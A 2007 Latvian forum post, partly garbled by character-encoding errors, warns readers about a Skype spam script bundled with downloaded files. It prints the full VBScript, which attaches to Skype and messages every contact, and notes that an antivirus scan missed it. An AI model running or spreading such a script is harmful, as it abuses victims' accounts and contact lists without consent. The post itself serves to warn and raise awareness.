K

Moderatori: janis.wd, Vecākie lietotāji

User avatar
foxsk8
Moderators
Atbildes: 5078
Pievienojies: 22 Feb 2007, 12:33
Reputācija: 0
Atrodas: Liepāja, www.notepad.lv

K

Post no foxsk8 » 08 Mai 2007, 20:19

Visiem mums ir zinâms Draugu Fu****, tagad jau arî uzradies Skype spamers, kas izsûta noteiktu tekstu visiem kontaktiem vienu reizi. Iespçjamo tekstu ir iespçjams mainît un koriìçt. Vienam tas liekas interesanti, bet citiem tas var sagâdât pamatîgas galvassâpes, kad lejupielâdçjot kâdu failu no interneta lîdzi nâk skype spamers.

Kods ir ðâds

Code: Select all

on error resume next
set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")
set uDlVA = wscript.createobject("wscript.shell")
set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
yADAl.Client.Start()
yADAl.Attach()
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle," :* "
next
msgbox "Piekritu!!",,"Bu4muulis"
Noskençju ar Avast, neko pat neuzrâdîja. Esiet uzmanîgi no failiem ar nosaukumu skype.vbs kâ arî no *.vbs paplaðinâjumiem

Notepad.lv administrâcija neuzòemas nekâdu atbildîbu, par sniegtâs informâcijas sekâm
WPX.lV - E-komercijas risinājumi

Pievienot atbildi

Return to “Viss pārējais ”